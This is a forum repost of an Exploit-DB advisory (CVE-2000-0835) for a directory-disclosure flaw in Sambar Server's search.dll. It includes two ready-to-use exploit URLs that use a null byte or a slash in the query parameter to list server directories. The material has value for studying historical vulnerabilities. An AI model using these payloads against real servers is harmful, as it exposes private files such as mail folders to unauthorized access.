Exploit Sambar Server 4.3/4.4 Beta 3 - Search CGI

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20223
Проверка EDB
  1. Пройдено
Автор
DETHY
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2000-0835
Дата публикации
2000-09-15
Код:
source: https://www.securityfocus.com/bid/1684/info

The Sambar Server was created to test a three-tier communication infrastructure modeled after the Sybase Open Client/Open Server. Soon thereafter, the idea of leveraging the infrastructure for dynamic delivery of content on the WWW resulted in the addition of an HTTP protocol stack, and efforts in supporting the notion of preexistent users via HTTP. 

Certain NT versions of this software ship with a vulnerability in the search.dll which allows remote attackers to view the contents of the SAMBAR Server such as mail folders etc by passing paths or invalid values in the 'query' variable.

All that is needed is a malformed query parameter parsed to the search.dll file
.

http://server-running-sambar.com/search.dll?search?query=%00&logic=AND

.. this will reveal the current working directory contents.


http://server-running-sambar.com/search.dll?search?query=/&logic=AND

.. this will reveal the root dir of the server.
 
Источник
www.exploit-db.com

Похожие темы